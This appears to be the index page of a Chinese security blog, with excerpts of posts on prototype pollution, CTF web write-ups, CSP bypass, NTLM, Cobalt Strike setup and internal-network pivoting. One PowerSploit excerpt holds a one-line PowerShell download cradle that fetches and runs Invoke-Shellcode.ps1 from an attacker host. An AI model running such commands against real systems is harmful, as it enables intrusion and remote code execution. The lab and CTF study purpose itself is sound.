Hu3sky's blog

Hu3sky's blog

Hack the World

JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
JavaScript Prototype 污染攻击 之 Code-Breaking-TheJS篇学了JavaScript Prototype 污染攻击就来做下这个题拿Express写的 add后的req包 1234567891011121314POST / HTTP/1.1Host: 127.0.0.1:3000User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml...
JavaScript Prototype 污染攻击之 基础篇
JavaScript Prototype 污染攻击之 基础篇JS创建类的方法通过”字面量“方式创建1var person = (name:'dongjc', work:function() {console.log('write coding')}); 通过”构造函数“方式创建。通过object方式创建1234567var person = new Object();person.name = "dongjc";person.age = 32;person.Introduce = function () &#...
内网中的PowerSploit
内网中的PowerSploit靶机 Win2008攻击机 Kali Powershell下载命令获取补丁 1Get-WmiObject -Class Win32_QuickFixEngineering 一句话下载 1IEX(New-Object Net.WebClient).DownloadString("http://192.168.107.1/PS1/Invoke-Shellcode.ps1) Shellcode InjectionInvoke-Shellcode.ps1-Shellcode注入 先在win2008上下载攻击机上的ps脚本 1IEX(New-Object ...
第12届全国大学生信息安全竞赛Web题解
全国大学生Web1一共三个考点: parse_url绕过http://lawlietweb.com/2018/05/13/parse_url/ wakeup绕过https://paper.seebug.org/39/ 随机数(此处两解) hint.php 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051<?phperror_reporting(E_ALL);class Handle{ private $handle; /...
DDCTF部分 Write up
DDCTF菜的真实,只出了3个Web 滴(脑洞题)http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 flag.jpg -> hex -> base64 -> base64 换成index.php 拿到源码 https://blog.csdn.net/FengBanLiuYun/article/details/80913909 提示practice.txt 于是读 发现f1ag!ddctf.php改为f1agconfigddctf.php 读到源码 123456789101112131...
How To Use Cobalt Strike(备忘录)
How To Use Cobalt Strike(备忘录)下载地址参考lz1y师傅的https://xz.aliyun.com/t/2170 记录一下Cobalt Strike一些简单的使用 Infokali 192.168.107.145vps 34.xx.xx.xx Service OnLocal直接在kali运行 12# 本地默认密码12345./teamserver 127.0.0.1 12345 With VPSvps上运行 12./teamserver IP 密码./teamserver 34.xx.xx.xx hu3sky 然后在用kali User随意填写 Passw...
Content Security Policy&Bypass
Content Security Policy&BypassCSP(Content Security Policy),为了缓解很大一部分潜在的跨站脚本问题,浏览器引入了CSP这一策略,告诉了客户端哪些外部资源可以加载和执行,等同于提供了白名单 CSP 大大增强了网页的安全性。攻击者即使发现了漏洞,也没法注入脚本,除非还控制了一台列入了白名单的可信主机 CSP生成器CSP安全检测 Use CSP 通过 HTTP 头信息的Content-Security-Policy的字段。 12345//内容源必须为同源或者是 hu3sky.oooContent-Security-Policy:...
跨域相关问题
同源策略同源策略是一种约定,它是浏览器最核心也是最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能会收到影响,可以说Web是构建在同源策略上的,浏览器只是针对同源策略的一种实现 来自不同源的对象无法相互干扰比如a.com带着cookie访问b.com,而b.com能读取到a.com的cookie,所以为了避免这种情况产生,就有了同源策略使用jQuery向不同源目标站发送请求 1$.post("http://hu3sky.ooo") 这里的Access-Control-Allow-Origin头表示服务端允许哪些源的请求 以下情况被认为是不同源的 12345...
Windows安全下的一些网络认证
NTLMNTLM HASH加密过程假设我的密码是hu3sky,先将hu3sky转换为十六进制,经过Unicode转换后,再调用MD4加密算法加密,这个加密结果的十六进制就是NTLM Hash 在Windows中,密码Hash目前称之为NTLM Hash,其中NTLM全称是:“NT LAN Manager”。这个NTLM是一种网络认证协议,与NTLM Hash的关系就是:NTLM网络认证协议是以NTLM Hash作为根本凭证进行认证的协议。也就是说,NTLM与NTLM Hash相互对应。在本地认证的过程中,其实就是将用户输入的密码转换为NTLM Hash与SAM中的NTLM Hash进行比...
三层内网搭建&MSF正反向代理穿透
Network topology Settings网卡情况 winxpadmin@123双网卡,仅主机网卡 win2003admin@123网卡一和NAT,NAT和本机互通 win2008admin!@#$123网卡二 Kali(Attacker)NAT和本机互通 攻击过程第一层内网通过一个web漏洞,拿下边缘机win2003的shell首先进行信息搜集 信息搜集ip情况 1234567891011121314151617181920212223C:\phpStudy\WWW\> ipconfigWindows IP ConfigurationEthernet adapter 本地...
Hu3sky
Keep going,Get Stronger